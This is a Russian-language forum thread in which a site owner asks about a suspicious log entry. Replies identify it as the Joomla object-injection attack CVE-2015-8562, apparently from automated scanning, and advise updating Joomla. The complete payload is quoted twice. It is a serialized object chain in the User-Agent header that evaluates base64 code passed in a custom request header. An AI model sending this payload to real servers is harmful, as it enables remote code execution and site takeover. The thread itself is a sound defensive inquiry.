HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.11.2016, 19:32
FriLL
Познающий
Регистрация: 14.09.2008
Сообщений: 30
Провел на форуме:
117615

Репутация: 21
По умолчанию

В логах всплыла такая строчка

IP: 31.173.226.6

User Agent:

gILMC}__BPrXyydvjI|O:21:"JDatabaseDriverMysqli":3: {s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:" \0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"S implePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverM ysql":0:{}s:5:"cache";b:1;s:19:"cache_name_functio n";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed _url";s:71:"eval(base64_decode($_SERVER['HTTP_HGSEK']));JFactory::getConfig();exit;";}i:1;s:4:"init";}} s:13:"\0\0\0connection";i:1;}󓲑

NO REFERER

2016-11-01 16:26:25

Не пойму это эксплойт какойто или что?

Сидеть спокойно или заморочиться c защитой?
 
Ответить с цитированием

  #2  
Старый 01.11.2016, 19:35
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от FriLL  

В логах всплыла такая строчка
IP: 31.173.226.6
User Agent:
gILMC}__BPrXyydvjI|O:21:"JDatabaseDriverMysqli":3: {s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:" \0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"S implePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverM ysql":0:{}s:5:"cache";b:1;s:19:"cache_name_functio n";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed _url";s:71:"eval(base64_decode($_SERVER['HTTP_HGSEK']));JFactory::getConfig();exit;";}i:1;s:4:"init";}} s:13:"\0\0\0connection";i:1;}󓲑
NO REFERER
2016-11-01 16:26:25
Не пойму это эксплойт какойто или что?
Сидеть спокойно или заморочиться c защитой?
это похоже на свежий баг сериализации, которым порнхаб хакнули, ну пыху обнови и не парься

а может и бекдор где то валяется в коде
 
Ответить с цитированием

  #3  
Старый 01.11.2016, 19:39
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

а ёп это джумла

https://cve.mitre.org/cgi-bin/cvenam...=CVE-2015-8562

https://www.exploit-db.com/exploits/38977/

обновить джумлу или забить если её нет вовсе
 
Ответить с цитированием

  #4  
Старый 01.11.2016, 19:40
FriLL
Познающий
Регистрация: 14.09.2008
Сообщений: 30
Провел на форуме:
117615

Репутация: 21
По умолчанию

Ну вроде обновляю переодически

Цитата:
Сообщение от t0ma5  

а может и бекдор где то валяется в коде
Да там код как 2 копейки, заметил бы
 
Ответить с цитированием

  #5  
Старый 01.11.2016, 19:41
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от FriLL  

Ну вроде обновляю переодически
Да там код как 2 копейки, заметил бы
да я поспешил с первым ответом, это ищут уязвимые joomla движки
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.